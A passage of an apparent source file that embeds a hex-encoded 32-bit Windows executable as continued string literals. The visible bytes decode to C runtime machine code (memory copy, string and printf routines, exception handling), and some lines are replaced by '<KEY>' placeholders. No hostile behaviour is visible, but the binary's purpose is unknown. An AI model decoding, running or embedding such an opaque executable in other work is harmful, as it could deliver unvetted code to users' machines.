'2000083c8ffe9c40000008b7d10568b750c85ff741c85f67518e8c3220000' \
'c70016000000e84922000083c8ffe99c000000c745ec420000008975e8897' \
'5e081ffffffff3f7609c745e4ffffff7feb068d043f8945e453ff751c8d45' \
'e0ff7518ff751450ff550883c4108bd885f6745d85db7849ff4de4780f8b4' \
'5e0c600008b45e0408945e0eb158d45e0506a00e806590000595983f8ff74' \
'238b45e0ff4de47805c60000eb128d45e0506a00e8e7580000595983f8ff7' \
'4048bc3eb1033c03945e46689447efe0f9dc083e8025b5e5fc9c3558bec83' \
'7d10007515e802220000c70016000000e88821000083c8ff5dc3568b75088' \
'5f6743b837d0c007635ff7518ff7514ff7510ff750c566885414100e8c4fe' \
'ffff83c41885c0790533c966890e83f8fe7520e8b7210000c70022000000e' \
'b0be8aa210000c70016000000e83021000083c8ff5e5dc3558becff75146a' \
'00ff7510ff750cff7508e873ffffff83c4145dc3ff35987d4200ff15f8a14' \
'10085c07402ffd06a19e8966600006a016a00e84868000083c40ce95f6800' \
'00558bec6a0a6a00ff7508e86e6b000083c40c5dc36a1468302d4200e8133' \
'400006a01e8ff6e000059b84d5a000066390500004000740433dbeb33a13c' \
'00400081b8000040005045000075ebb90b0100006639881800400075dd33d' \
'b83b8740040000e76093998e80040000f95c3895de4e8816b000085c07508' \
'6a1ce8e800000059e8381d000085c075086a10e8d700000059e8766f00008' \
'365fc00e88835000085c079086a1be8bd00000059ff1538a14100a3588142' \
'00e8916f0000a398744200e8456b000085c079086a08e8423b000059e86d6' \
'd000085c079086a09e8313b0000596a01e8633b00005985c0740750e81e3b' \
'000059a15c774200a34077420050ff3554774200ff354c774200e8594bfff' \
'f83c40c8bf08975dc85db750656e8853d0000e8153b0000eb2e8b4dec8b01' \
'8b008945e05150e8a94700005959c38b65e88b75e08975dc837de40075065' \
'6e88a3b0000e8d63a0000c745fcfeffffff8bc6e811330000c3558bec833d' \
'ac7f4200027405e8ac640000ff7508e80465000068ff000000e8723a00005' \
'9595dc3e8df6d0000e97bfeffff558bec837d0800742dff75086a00ff359c' \
'7d4200ff1524a1410085c0751856e8971f00008bf0ff15c0a0410050e89c1' \
'f00005989065e5dc3cccc8b54240c8b4c240485d2747f0fb64424080fba25' \
'c474420001730d8b4c240c578b7c2408f3aaeb5d8b54240c81fa800000007' \
'c0e0fba25c86a4200010f823e6f0000578bf983fa047231f7d983e103740c' \
'2bd1880783c70183e90175f68bc8c1e00803c18bc8c1e01003c18bca83e20' \
'3c1e9027406f3ab85d2740a880783c70183ea0175f68b4424085fc38b4424' \
'04c357568b7424108b4c24148b7c240c8bc18bd103c63bfe76083bf80f826' \
'80300000fba25c4744200017307f3a4e91703000081f9800000000f82ce01' \
'00008bc733c6a90f000000750e0fba25c86a4200010f82da0400000fba25c' \
'4744200000f83a7010000f7c7030000000f85b8010000f7c6030000000f85' \
'970100000fbae702730d8b0683e9048d760489078d7f040fbae7037311f30' \
'f7e0e83e9088d7608660fd60f8d7f08f7c60700000074630fbae6030f83b2' \
'000000660f6f4ef48d76f4660f6f5e1083e930660f6f4620660f6f6e308d7' \
'63083f930660f6fd3660f3a0fd90c660f7f1f660f6fe0660f3a0fc20c660f' \
'7f4710660f6fcd660f3a0fec0c660f7f6f208d7f307db78d760ce9af00000' \
'0660f6f4ef88d76f88d4900660f6f5e1083e930660f6f4620660f6f6e308d' \
'763083f930660f6fd3660f3a0fd908660f7f1f660f6fe0660f3a0fc208660' \
'<KEY>' \
'6f4efc8d76fc8bff660f6f5e1083e930660f6f4620660f6f6e308d763083f' \
'930660f6fd3660f3a0fd904660f7f1f660f6fe0660f3a0fc204660f7f4710' \
'<KEY>' \
'f0e83e9108d7610660f7f0f8d7f10ebe80fbae102730d8b0683e9048d7604' \
'89078d7f040fbae1037311f30f7e0e83e9088d7608660fd60f8d7f088b048' \
'dc8ed4000ffe0f7c7030000007515c1e90283e20383f908722af3a5ff2495' \
'c8ed4000908bc7ba0300000083e904720c83e00303c8ff2485dcec4000ff2' \
'48dd8ed400090ff248d5ced400090ecec400018ed40003ced400023d18a06' \
'88078a46018847018a4602c1e90288470283c60383c70383f90872ccf3a5f' \
'f2495c8ed40008d490023d18a0688078a4601c1e90288470183c60283c702' \
'83f90872a6f3a5ff2495c8ed40009023d18a06880783c601c1e90283c7018' \
'3f9087288f3a5ff2495c8ed40008d4900bfed4000aced4000a4ed40009ced' \
'400094ed40008ced400084ed40007ced40008b448ee489448fe48b448ee88' \
'9448fe88b448eec89448fec8b448ef089448ff08b448ef489448ff48b448e' \
'f889448ff88b448efc89448ffc8d048d0000000003f003f8ff2495c8ed400' \
'08bffd8ed4000e0ed4000eced400000ee40008b44240c5e5fc3908a068807' \
'8b44240c5e5fc3908a0688078a46018847018b44240c5e5fc38d49008a068' \
'8078a46018847018a46028847028b44240c5e5fc3908d7431fc8d7c39fcf7' \
'c7030000007524c1e90283e20383f908720dfdf3a5fcff249564ef40008bf' \
'ff7d9ff248d14ef40008d49008bc7ba0300000083f904720c83e0032bc8ff' \
'248568ee4000ff248d64ef40009078ee40009cee4000c4ee40008a460323d' \
'188470383ee01c1e90283ef0183f90872b2fdf3a5fcff249564ef40008d49' \
'008a460323d18847038a4602c1e90288470283ee0283ef0283f9087288fdf' \
'3a5fcff249564ef4000908a460323d18847038a46028847028a4601c1e902' \
'88470183ee0383ef0383f9080f8256fffffffdf3a5fcff249564ef40008d4' \
'90018ef400020ef400028ef400030ef400038ef400040ef400048ef40005b' \
'ef40008b448e1c89448f1c8b448e1889448f188b448e1489448f148b448e1' \
'089448f108b448e0c89448f0c8b448e0889448f088b448e0489448f048d04' \
'8d0000000003f003f8ff249564ef40008bff74ef40007cef40008cef4000a' \
'0ef40008b44240c5e5fc3908a46038847038b44240c5e5fc38d49008a4603' \
'8847038a46028847028b44240c5e5fc3908a46038847038a46028847028a4' \
'6018847018b44240c5e5fc38da42400000000578bc683e00f85c00f85d200' \
'00008bd183e17fc1ea0774658da4240000000090660f6f06660f6f4e10660' \
'f6f5620660f6f5e30660f7f07660f7f4f10660f7f5720660f7f5f30660f6f' \
'6640660f6f6e50660f6f7660660f6f7e70660f7f6740660f7f6f50660f7f7' \
'760660f7f7f708db6800000008dbf800000004a75a385c9744f8bd1c1ea04' \
'85d274178d9b00000000660f6f06660f7f078d76108d7f104a75ef83e10f7' \
'42a8bc1c1e902740d8b1689178d76048d7f044975f38bc883e103740f8a06' \
'880746474975f78d9b00000000585e5fc38da42400000000eb03ccccccba1' \
'00000002bd02bca518bc28bc883e10374098a16881746474975f7c1e80274' \
'0d8b1689178d76048d7f044875f359e9fafeffffccccccccccccccccccccc' \
'ccc8b4c2404f7c10300000074248a0183c10184c0744ef7c10300000075ef' \
'05000000008da424000000008da424000000008b01bafffefe7e03d083f0f' \
'f33c283c104a90001018174e88b41fc84c0743284e47424a90000ff007413' \
'a9000000ff7402ebcd8d41ff8b4c24042bc1c38d41fe8b4c24042bc1c38d4' \
'<KEY>' \
'00c7064cb54100c6460800ff30e8a80000008bc65e5dc20400558bec8b450' \
'8c7014cb541008b00894104c64108008bc15dc20800558bec56ff75088bf1' \
'83660400c7064cb54100c6460800e8120000008bc65e5dc20400c7014cb54' \
'<KEY>' \
'<KEY>' \
'68bf1c7064cb54100e852000000f6450801740756e82bceffff598bc65e5d' \
'c20400558bec837d0800538bd9742d57ff7508e89afeffff8d780157e8e21' \
'<KEY>' \
'5dc20400568bf1807e08007409ff7604e846f7ffff5983660400c64608005' \
'<KEY>' \
'<KEY>' \
'94df88945fc85c0740cf600087407c745f4004099018d45f450ff75f0ff75' \
'e4ff75e0ff15e0a14100c9c208008b4df464890d00000000595f5f5e5b8be' \
'55d51c38b4df033cde848cdffffe9ddffffff5064ff35000000008d44240c' \
'2b64240c53565789288be8a16063420033c550ff75fcc745fcffffffff8d4' \
'5f464a300000000c35064ff35000000008d44240c2b64240c53565789288b' \
'e8a16063420033c5508945f0ff75fcc745fcffffffff8d45f464a30000000' \
'0c35064ff35000000008d44240c2b64240c53565789288be8a16063420033' \
'c5508965f0ff75fcc745fcffffffff8d45f464a300000000c3558bec56fc8' \
'b750c8b4e0833cee892ccffff6a0056ff7614ff760c6a00ff7510ff7610ff' \
'7508e8e273000083c4205e5dc3558bec5153fc8b450c8b4808334d0ce85fc' \
'cffff8b45088b400483e06674118b450cc740240100000033c040eb6ceb6a' \
'6a018b450cff70188b450cff70148b450cff700c6a00ff75108b450cff701' \
'0ff7508e88573000083c4208b450c83782400750bff7508ff750ce8180200' \
'006a006a006a006a006a008d45fc506823010000e87c00000083c41c8b45f' \
'c8b5d0c8b631c8b6b20ffe033c0405bc9c3558bec83ec18a1606342008365' \
'e8008d4de833c18b4d088945f08b450c8945f48b451440c745ecb5f340008' \
'94df88945fc64a1000000008945e88d45e864a300000000ff751851ff7510' \
'e8ce6500008bc88b45e864a3000000008bc1c9c35859870424ffe0558bec8' \
'3ec3853817d08230100007512b891f540008b4d0c890133c040e9b0000000' \
'8365c800c745cce6f34000a1606342008d4dc833c18945d08b45188945d48' \
'b450c8945d88b451c8945dc8b45208945e08365e4008365e8008365ec0089' \
'65e4896de864a1000000008945c88d45c864a300000000c745fc010000008' \
'b45088945f08b45108945f4e83b0f00008b80800000008945f88d45f0508b' \
'4508ff30ff55f859598365fc00837dec007417648b1d000000008b038b5dc' \
'8890364891d00000000eb098b45c864a3000000008b45fc5bc9c3558bec51' \
'518b4508538b5d0c8b4810568b700c57894df88bfe8975fc85db78358b551' \
'083feff750be8026500008b4df88b55104e8bc66bc014395408047d063b54' \
'<KEY>' \
'<KEY>' \
'c3558bec51538b450c83c00c8945fc648b1d000000008b0364a3000000008' \
'<KEY>' \
'0000008975f8c745fc96f640006a00ff750cff75fcff7508ff151ca241008' \
'b450c8b400483e0fd8b4d0c894104648b3d000000008b5df8893b64891d00' \
'0000005f5e5bc9c20800558bec8b4d0c568b7508890ee8e10d00008b88980' \
'00000894e04e8d30d000089b0980000008bc65e5dc3558bec56e8bf0d0000' \
'8b75083bb0980000007511e8af0d00008b4e048988980000005e5dc3e89e0' \
'd00008b8898000000eb098b41043bf0740f8bc88379040075f15e5de9bb63' \
'00008b4604894104ebd2558bece8700d00008b809800000085c0740e8b4d0' \
'83908740c8b400485c075f533c0405dc333c05dc3558bec83ec08535657fc' \
'8945fc33c0505050ff75fcff7514ff7510ff750cff7508e83a70000083c42' \
'08945f85f5e5b8b45f88be55dc3cccccccccccccccc8b5424048b4c2408f7' \
'c20300000075408b023a01753284c074263a6101752984e4741dc1e8103a4' \
'102751d84c074113a6103751483c10483c20484e475d28bff33c0c3eb03cc' \
'cccc1bc083c801c38bfff7c20100000074188a0283c2013a0175e783c1018' \
'4c074d8f7c20200000074a0668b0283c2023a0175ce84c074c23a610175c5' \
'84e474b983c102eb846a0c68502d4200e8282400006a0ee86129000059836' \
'5fc008b75088b460485c074308b0da0744200ba9c744200894de485c97411' \
'3901752c8b410489420451e856f1ffff59ff7604e84df1ffff5983660400c' \
'745fcfeffffffe80a000000e816240000c38bd1ebc56a0ee8692a000059c3' \
'558bec53568b3518a14100578b7d0857ffd6837f78007405ff7778ffd68b8' \
'78000000085c0740350ffd6837f7c007405ff777cffd68b878800000085c0' \
'740350ffd66a06588d5f1c894508817bf894684200740c833b007407ff33f' \
'fd68b4508837bf400740e837bfc007408ff73fcffd68b450883c310488945' \
'0875ce8b879c00000005b000000050ffd65f5e5b5dc3558bec53568b75083' \
'3db8b86840000005785c074663df86d4200745f8b467885c0745839187554' \
'8b868000000085c074173918751350e85ef0ffffffb684000000e8df70000' \
'059598b467c85c074173918751350e840f0ffffffb684000000e8bd710000' \
'5959ff7678e82bf0ffffffb684000000e820f0ffff59598b868800000085c' \
'07444391875408b868c0000002dfe00000050e8ffefffff8b8694000000bf' \
'800000002bc750e8ecefffff8b86980000002bc750e8deefffffffb688000' \
'000e8d3efffff83c4108b869c0000003d98684200741b3998b00000007513' \
'50e8a4710000ffb69c000000e8aaefffff59596a06588d9ea00000008d7e1' \
'c894508817ff894684200741d8b0785c07414833800750f50e87fefffffff' \
'33e878efffff59598b4508837ff40074168b47fc85c0740c833800750750e' \
'85befffff598b450883c30483c7104889450875b256e845efffff595f5e5b' \
'5dc3558bec568b750885f60f848700000053578b3df0a0410056ffd7837e7' \
'8007405ff7678ffd78b868000000085c0740350ffd7837e7c007405ff767c' \
'ffd78b868800000085c0740350ffd76a06588d5e1c894508817bf89468420' \
'0740c833b007407ff33ffd78b4508837bf400740e837bfc007408ff73fcff' \
'd78b450883c3104889450875ce8b8e9c00000081c1b000000051ffd75f5b8' \
'bc65e5dc36a0c68702d4200e832210000e87e0900008bf08b0dc46a420085' \
'4e707422837e6c00741ce8660900008b706c85f675086a20e8e7280000598' \
'bc6e844210000c36a0ce837260000598365fc00ff35fc6942008d466c50e8' \
'2100000059598bf08975e4c745fcfeffffffe805000000ebbc8b75e46a0ce' \
'<KEY>' \
'28578938e8defcffff5985f6741b56e8bdfeffff833e0059750f81fe006a4' \
'200740756e84ffdffff598bc75eeb0233c05f5dc3833dc88042000075126a' \
'fde85003000059c705c88042000100000033c0c3558bec8b45082da403000' \
'0742683e804741a83e80d740e48740433c05dc3a194b541005dc3a190b541' \
'005dc3a18cb541005dc3a188b541005dc3558bec83ec108d4df06a00e8a4c' \
'4ffff8b45088325bc7442000083f8fe7512c705bc74420001000000ff1528' \
'a24100eb2c83f8fd7512c705bc74420001000000ff1524a24100eb1583f8f' \
'c75108b45f0c705bc744200010000008b4004807dfc0074078b4df8836170' \
'fdc9c3558bec538b5d085657680101000033ff8d73185756e839edffff33c' \
'00fb7c8897b04897b0889bb1c0200008bc1c1e1100bc18d7b0cabababbf70' \
'66420083c40c2bfbb9010100008a04378806464975f78d8b19010000ba000' \
'100008a04398801414a75f75f5e5b5dc3558bec81ec20050000a160634200' \
'33c58945fc53568b7508578d85e8faffff50ff7604ff152ca2410033dbbf0' \
'001000085c00f84f00000008bc3888405fcfeffff403bc772f48a85eefaff' \
'ffc685fcfeffff208d8deefaffffeb1f0fb651010fb6c0eb0d3bc7730dc68' \
'405fcfeffff20403bc276ef83c1028a0184c075dd53ff76048d85fcfaffff' \
'50578d85fcfeffff506a0153e89f74000053ff76048d85fcfdffff5750578' \
'd85fcfeffff5057ffb61c02000053e84e73000083c4408d85fcfcffff53ff' \
'76045750578d85fcfeffff506800020000ffb61c02000053e82673000083c' \
'4248bcb0fb7844dfcfaffffa801740e804c0e19108a840dfcfdffffeb10a8' \
'027415804c0e19208a840dfcfcffff88840e19010000eb07889c0e1901000' \
'0413bcf72c1eb576a9f8d9619010000582bc28bcb8985e0faffff03d103c2' \
'8985e4faffff83c02083f819770a804c0e19108d4120eb1183bde4faffff1' \
'9770c804c0e19208d41e08802eb02881a8b85e0faffff418d96190100003b' \
'<KEY>' \
'<KEY>' \
'6a20e86a250000598bc6e8c71d0000c36a0de8ba220000598365fc008b776' \
'88975e43b3570634200743685f6741a56ff15f0a0410085c0750f81fe7066' \
'4200740756e8b0eaffff59a1706342008947688b35706342008975e456ff1' \
'518a14100c745fcfeffffffe805000000eb8e8b75e46a0de8bd23000059c3' \
'6a1068b02d4200e80b1d000083cfffe8540500008bd8895de4e83dffffff8' \
'b7368ff7508e8cffcffff598945083b46040f846e0100006820020000e8da' \
'230000598bd885db0f845b010000b9880000008b45e48b70688bfbf3a533f' \
'6893353ff7508e84701000059598bf8897d0885ff0f850d0100008b45e4ff' \
'7068ff15f0a0410085c08b45e475158b486881f970664200740a51e8e3e9f' \
'fff598b45e489586853ff1518a141008b45e4f64070020f85f1000000f605' \
'c46a4200010f85e40000006a0de88e210000598975fc8b4304a3a87442008' \
'b4308a3ac7442008b831c020000a3a47442008bce894de083f9057d10668b' \
'444b0c6689044db074420041ebe88bce894de081f9010100007d0d8a44191' \
'888816864420041ebe88975e081fe000100007d108a841e19010000888670' \
'65420046ebe5ff3570634200ff15f0a0410085c07513a1706342003d70664' \
'200740750e824e9ffff59891d7063420053ff1518a14100c745fcfeffffff' \
'e805000000eb318b7d086a0de83c22000059c3eb2383ffff751e81fb70664' \
'200740753e8e7e8ffff59e89c080000c70016000000eb0233ff8bc7e8af1b' \
'0000c3558bec83ec20a16063420033c58945fc5356ff75088b750ce82dfbf' \
'fff8bd859895de085db750e56e889fbffff5933c0e9b20100005733ff8bcf' \
'894de48bc73998786342000f84f20000004183c030894de43df000000072e' \
'681fbe8fd00000f84d000000081fbe9fd00000f84c40000000fb7c350ff15' \
'20a2410085c00f84b20000008d45e85053ff152ca2410085c00f848c00000' \
'068010100008d46185750e864e8ffff895e0433db4383c40c89be1c020000' \
'395de8764f807dee008d45ee74218a500184d2741a0fb6080fb6d2eb06804' \
'c0e1904413bca76f683c00280380075df8d461ab9fe000000800808404975' \
'f9ff7604e816faffff83c40489861c020000895e08eb03897e0833c00fb7c' \
'88bc1c1e1100bc18d7e0cabababe9bb000000393dbc744200740b56e886fa' \
'ffffe9ae00000083c8ffe9a900000068010100008d46185750e8bde7ffff8' \
'b55e483c40c6bd2308d82886342008945e48038008bc874358a410184c074' \
'2b0fb6190fb6c0eb1781fb0001000073138a877463420008441e190fb6410' \
'1433bd876e583c10280390075ce8b45e44783c0088945e483ff0472b88b5d' \
'e053895e04c7460801000000e857f9ffff83c40489861c0200006a068d4e0' \
'c8d927c6342005f668b026689018d52028d49024f75f156e83cfaffff5933' \
'c05f8b4dfc5e33cd5be86fbdffffc9c3558bec51668b4508b9ffff0000663' \
'bc1750433c0c9c3b900010000663bc1730e0fb7c8a1506e42000fb70448eb' \
'1c8d45fc506a018d4508506a01ff1530a24100f7d81bc02345fc0fb7c00fb' \
'74d0c23c1c9c3a190684200c36a0868d02d4200e8101900008b750885f60f' \
'8400010000837e24007409ff7624e85de6ffff59837e2c007409ff762ce84' \
'ee6ffff59837e34007409ff7634e83fe6ffff59837e3c007409ff763ce830' \
'e6ffff59837e40007409ff7640e821e6ffff59837e44007409ff7644e812e' \
'6ffff59837e48007409ff7648e803e6ffff59817e5cd0bc41007409ff765c' \
'e8f1e5ffff596a0de8c31d0000598365fc008b7e6885ff741a57ff15f0a04' \
'10085c0750f81ff70664200740757e8c4e5ffff59c745fcfeffffffe85700' \
'00006a0ce88a1d000059c745fc010000008b7e6c85ff742357e85cf6ffff5' \
'93b3dfc694200741481ff006a4200740c833f00750757e8e6f4ffff59c745' \
'fcfeffffffe81e00000056e86ce5ffff59e845180000c204008b75086a0de' \
'8971e000059c38b75086a0ce88b1e000059c3558beca19068420083f8ff74' \
'27568b750885f6750e50e8600700008bf0a190684200596a0050e86f07000' \
'0595956e896feffff5e5dc356e8120000008bf085f675086a10e87c1f0000' \
'598bc65ec35657ff15c0a04100ff35906842008bf8e8180700008bf05985f' \
'6754768bc0300006a01e8281e00008bf0595985f6743356ff3590684200e8' \
'10070000595985c074186a0056e8250000005959ff1500a24100834e04ff8' \
'906eb0956e89de4ffff5933f657ff1534a241005f8bc65ec36a0868f82d42' \
'00e81c1700008b7508c7465cd0bc41008366080033ff47897e14897e706a4' \
'358668986b8000000668986be010000c746687066420083a6b8030000006a' \
'0de81f1c0000598365fc00ff7668ff1518a14100c745fcfeffffffe83e000' \
'0006a0ce8fe1b000059897dfc8b450c89466c85c07508a1fc69420089466c' \
'ff766ce8ddf2ffff59c745fcfeffffffe815000000e8d3160000c333ff478' \
'b75086a0de8241d000059c36a0ce81b1d000059c3e82f1f0000e8da1c0000' \
'85c07508e86300000033c0c36844034100e8ae05000059a39068420083f8f' \
'f74e35668bc0300006a01e8f61c00008bf0595985f6742d56ff3590684200' \
'e8de050000595985c0741b6a0056e8f3feffff5959ff1500a24100834e04f' \
'f890633c0405ec3e80400000033c05ec3a19068420083f8ff740e50e86605' \
'0000830d90684200ff59e9561b0000558bec8325c07442000083ec105333d' \
'b43091dc86a42006a0ae8fe83000085c00f840e01000033c98bc3891dc074' \
'42000fa2568b35c86a4200578d7df083ce028907895f04894f0889570cf74' \
'5f8000010008935c86a4200741383ce04c705c0744200020000008935c86a' \
'4200f745f800000010741383ce08c705c0744200030000008935c86a42006' \
'a0733c9580fa28d75f08906895e04894e0889560cf745f4000200008b35c4' \
'744200740983ce028935c474420033c033c90fa28d7df08907895f04894f0' \
'889570c817df447656e75755f817dfc696e65497556817df86e74656c754d' \
'33c04033c90fa28907895f04894f0889570c8b45f025f03fff0f3dc006010' \
'074233d60060200741c3d7006020074153d50060300740e3d600603007407' \
'3d70060300750983ce018935c47442005f5e33c05bc9c3558bec81ec28030' \
'000a16063420033c58945fc837d08ff577409ff7508e8d80300005983a5e0' \
'fcffff006a4c8d85e4fcffff6a0050e80fe2ffff8d85e0fcffff8985d8fcf' \
'fff8d8530fdffff83c40c8985dcfcffff8985e0fdffff898ddcfdffff8995' \
'd8fdffff899dd4fdffff89b5d0fdffff89bdccfdffff668c95f8fdffff668' \
'c8decfdffff668c9dc8fdffff668c85c4fdffff668ca5c0fdffff668cadbc' \
'fdffff9c8f85f0fdffff8b45048985e8fdffff8d45048985f4fdffffc7853' \
'0fdffff010001008b40fc8985e4fdffff8b450c8985e0fcffff8b45108985' \
'e4fcffff8b45048985ecfcffffff15e4a141008bf88d85d8fcffff50e8220' \
'600005985c0751385ff750f837d08ff7409ff7508e8e5020000598b4dfc33' \
'cd5fe881b7ffffc9c3558bec8b4508a3c87442005dc3558becff35c874420' \
'0ff15f8a1410085c074035dffe0ff7518ff7514ff7510ff750cff7508e811' \
'000000cc33c05050505050e8c9ffffff83c414c36a17e87181000085c0740' \
'56a0559cd29566a01be170400c0566a02e875feffff56e87a05000083c410' \
'5ec3e877fbffff85c07506b83c6c4200c383c00cc3558bec56e8e4ffffff8' \
'b4d08518908e820000000598bf0e80500000089305e5dc3e843fbffff85c0' \
'7506b8386c4200c383c008c3558bec8b4d0833c03b0cc5d06a42007427408' \
'3f82d72f18d41ed83f81177056a0d585dc38d8144ffffff6a0e593bc81bc0' \
'23c183c0085dc38b04c5d46a42005dc3558bec568b750885f674138b550c8' \
'5d2740c8b4d1085c9751933c0668906e889ffffff6a165e8930e810ffffff' \
'<KEY>' \
'f85d275df668906e854ffffff6a22ebc9558bec568b750883fee0776f5357' \
'a19c7d420085c0751de8054400006a1ee85e44000068ff000000e8cc19000' \
'<KEY>' \
'85ff75266a0c5b3905f87f4200740d56e8ed0000005985c075a9eb07e8e4f' \
'effff8918e8ddfeffff89188bc75f5beb1456e8cc00000059e8c9feffffc7' \
'000c00000033c05e5dc3558bec8b451485c07e0b50ff7510e832d0ffff595' \
'9ff751cff751850ff7510ff750cff7508e81768000083c4185dc3cccccccc' \
'cccccccccccccccccccc518d4c24082bc883e10f03c11bc90bc159e9aa680' \
'000518d4c24082bc883e10703c11bc90bc159e9946800006a0868202e4200' \
'e828110000be006a42003935fc694200742a6a0ce854160000598365fc005' \
'668fc694200e842f0ffff5959a3fc694200c745fcfeffffffe806000000e8' \
'31110000c36a0ce88817000059c3558becff35d0744200ff15f8a1410085c' \
'0740fff7508ffd05985c0740533c0405dc333c05dc3558bec8b4508a3d074' \
'42005dc383255481420000c3558beca1e08042003305606342007407ff750' \
'8ffd05dc35dff25d0a14100558beca1e4804200330560634200ff75087404' \
'ffd05dc3ff1574a041005dc3558beca1e8804200330560634200ff7508740' \
'4ffd05dc3ff15cca141005dc3558beca1ec804200330560634200ff750cff' \
'<KEY>' \
'<KEY>' \
'468935446c420033c085f60f9fc05ec9c3565768a8b94100ff157ca041008' \
'b35a4a041008bf868c4b9410057ffd633056063420068d0b9410057a3e080' \
'4200ffd633056063420068d8b9410057a3e4804200ffd633056063420068e' \
'4b9410057a3e8804200ffd633056063420068f0b9410057a3ec804200ffd6' \
'330560634200680cba410057a3f0804200ffd63305606342006820ba41005' \
'7a3f4804200ffd63305606342006838ba410057a3f8804200ffd633056063' \
'42006850ba410057a3fc804200ffd63305606342006864ba410057a300814' \
'200ffd63305606342006884ba410057a304814200ffd6330560634200689c' \
'ba410057a308814200ffd633056063420068b4ba410057a30c814200ffd63' \
'3056063420068c8ba410057a310814200ffd633056063420068dcba410057' \
'a314814200ffd6330560634200a31881420068f8ba410057ffd6330560634' \
'2006818bb410057a31c814200ffd63305606342006834bb410057a3208142' \
'00ffd63305606342006854bb410057a324814200ffd63305606342006868b' \
'b410057a328814200ffd63305606342006884bb410057a32c814200ffd633' \
'05606342006898bb410057a334814200ffd633056063420068a8bb410057a' \
'330814200ffd633056063420068b8bb410057a338814200ffd63305606342' \
'0068c8bb410057a33c814200ffd633056063420068d8bb410057a34081420' \
'0ffd633056063420068f4bb410057a344814200ffd63305606342006808bc' \
'410057a348814200ffd63305606342006818bc410057a34c814200ffd6330' \
'5606342005fa3508142005ec3558becff7508ff153ca241005dc3558becff' \
'7508ff1530a1410050ff153ca141005dc3558bec6a00ff153ca24100ff750' \
'8ff1538a241005dc3558bec8b450885c07515e885faffffc70016000000e8' \
'0bfaffff83c8ff5dc38b40105dc3558bec837d08007426568b750cf7460c0' \
'0100000741856e8ebbbffff81660cffeeffff33c05989461889068946085e' \
'5dc3558bec568b750856e89effffff50e8d9650000595985c00f848600000' \
'057e891baffff83c0203bf0750433ffeb0fe881baffff83c0403bf0756633' \
'ff47ff0578744200f7460c0c0100007554833cbdd47442000053bb0010000' \
'0752553e8bf130000598904bdd474420085c075138d46146a028946088906' \
'58894618894604eb128b0cbdd4744200894e08890e895e18895e04814e0c0' \
'211000033c0405beb0233c05f5e5dc3558bec81ec80020000a16063420033' \
'c58945fc8b450853568b750c578b7d14ff75108985d0fdffff33c08bd88d8' \
'd88fdffff89b5f0fdffff89bde4fdffff8985b0fdffff899de8fdffff8985' \
'c8fdffff8985d8fdffff8985ccfdffff8985b8fdffff8985c4fdffffe8a0b' \
'0ffffe827f9ffff8985acfdffff8b85d0fdffff85c00f84cb0a0000f6400c' \
'40756350e873feffff598bc883f9ff741983f9fe74148bd183e21fc1f805c' \
'1e206031485e0744200eb05ba506c4200f642247f0f858f0a000083f9ff74' \
'1983f9fe74148bc183e11fc1f805c1e106030c85e0744200eb05b9506c420' \
'0f64124800f85620a000085f60f845a0a00008a0e33c08bd08995e0fdffff' \
'8985dcfdffff8985bcfdffff8985a8fdffff888deffdffff888db4fdffff8' \
'4c90f84040a00008bb59cfdffff8b85f0fdffff408985f0fdffff85d20f88' \
'e90900008d41e03c58770f0fbec10fbe8018bc410083e00feb0233c08bbdb' \
'cfdffff0fbebcc738bc41008bc7c1f80489bdbcfdffff8bbde4fdffff8985' \
'bcfdffff83f8070f8787090000ff2485501b410033c0838dd8fdffffff8bd' \
'88985a0fdffff8985b8fdffff8985c8fdffff8985ccfdffff899de8fdffff' \
'8985c4fdffffe94c0900000fbec183e820744683e803743983e808742f484' \
'8741d83e8038b85f0fdffff0f852d09000083cb08899de8fdffffe91f0900' \
'0083cb04899de8fdffffe90b09000083cb01ebf081cb80000000ebe883cb0' \
'2ebe380f92a752f8b0783c70489bde4fdffff8985c8fdffff85c00f89db08' \
'000083cb04f7d8899de8fdffff8985c8fdffffe9c50800008b85c8fdffff6' \
'bc00a8985c8fdffff0fbec18b8dc8fdffff83c1d003c8898dc8fdffffe99d' \
'08000033c08985d8fdffffe99008000080f92a752b8b0783c7048985d8fdf' \
'fff85c08b85f0fdffff89bde4fdffff0f8972080000838dd8fdffffffe966' \
'0800008b95d8fdffff6bd20a0fbec183c2d003d08995d8fdffffe93e08000' \
'080f949744580f96874388b85f0fdffff80f96c741480f9770f852c080000' \
'81cb00080000e9f7feffff80386c750c4081cb00100000e9e6feffff83cb1' \
'0e9defeffff83cb20e9e4feffff8b85f0fdffff8a003c36751c8bbdf0fdff' \
'ff807f013475108bc783c00281cb00800000e9aefeffff3c33751c8bbdf0f' \
'dffff807f013275108bc783c00281e3ff7fffffe98efeffff3c640f84aa07' \
'00003c690f84a20700003c6f0f849a0700003c750f84920700003c780f848' \
'a0700003c580f848207000033c08985bcfdffffeb0233c08985c4fdffff8d' \
'8588fdffff500fb6c150e8e4adffff595985c074388d85e0fdffff50ffb5d' \
'0fdffffffb5b4fdffffe8b90700008b8df0fdffff83c40c8a01418885b4fd' \
'ffff898df0fdffff84c00f84620700008d85e0fdffff50ffb5d0fdffffffb' \
'5b4fdffffe88107000083c40ce9fc0600000fbec183f8640f8fcd0100000f' \
'845102000083f8530f8fed000000747c83e84174104848745648487408484' \
'80f851805000080c120c785a0fdffff01000000888deffdffff8b85d8fdff' \
'ff83cb40ba00020000899de8fdffff8db5f4fdffff8995c0fdffff85c00f8' \
'932020000c785d8fdffff06000000e980020000f7c3300800000f859e0000' \
'0081cb00080000899de8fdffffe98d000000f7c330080000750c81cb00080' \
'000899de8fdffff8b95d8fdffffb9ffffff7f83faff74028bca8b3783c704' \
'89bde4fdfffff7c3100800000f845304000085f675068b354c6c4200c785c' \
'4fdffff010000008bc685c9740f33d249663910740783c00285c975f32bc6' \
'd1f8e93c04000083e8580f84b00200004848747083e8070f8427ffffff484' \
'80f852404000083c70489bde4fdfffff7c31008000074300fb747fc506800' \
'0200008d85f4fdffff508d85dcfdffff50e85961000083c41085c0741fc78' \
'5b8fdffff01000000eb138a47fc8885f4fdffffc785dcfdffff010000008d' \
'b5f4fdffffe9c50300008b0783c70489bde4fdffff85c074338b700485f67' \
'42c0fbf00f7c3000800007414992bc2d1f8c785c4fdffff01000000e98a03' \
'000033c9898dc4fdffffe97d0300008b35486c420056e816dbffff59e96b0' \
'3000083f8700f8fe30100000f84cf01000083f8650f8c5903000083f8670f' \
'8e4bfeffff83f869746483f86e742583f86f0f853d030000c785dcfdffff0' \
'800000084db795b81cb00020000899de8fdffffeb4d83c70489bde4fdffff' \
'8b7ffce8bec2ffff85c00f84000500008b85e0fdfffff6c3207405668907e' \
